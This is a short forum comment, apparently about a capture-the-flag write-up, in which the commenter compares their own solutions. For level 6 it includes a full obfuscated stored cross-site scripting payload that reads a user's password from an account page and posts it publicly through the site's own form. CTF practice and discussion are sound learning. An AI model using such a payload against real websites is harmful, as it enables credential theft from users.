Very similar to the methods I used :)<p>On level 5 I used a textfile on the compromised level 2 server instead of the 'cleaner' method shown here.<p>On level 6 I used some more JS:<p>}];</script><script type=text/html id=payload>$.get(<i>/user-hfbnljhhim/user_info</i>).done(function(data) { var pwd = escape($(data).find(<i>table tr td:last</i>).text()); $(<i>#title</i>).val(<i>pwd</i>); $(<i>#content</i>).val(pwd); $(<i>form</i>).unbind(<i>submit</i>); $(<i>form</i>).trigger(<i>submit</i>); } )</script><script type=text/javascript>$(function() {eval(String.fromCharCode(118,97,114,32,112,97,121,108,111,97,100,32,61,32,39,35,112,97,121,108,111,97,100,39)); eval($(payload).text().replace(/[*]/g, String.fromCharCode(39))); var post_data = [{}];});</script><script> var t = [{<p>It's funny to see how similar the python script is in level 8 with what I wrote, would be cool to see more writeups on this one with different solutions :)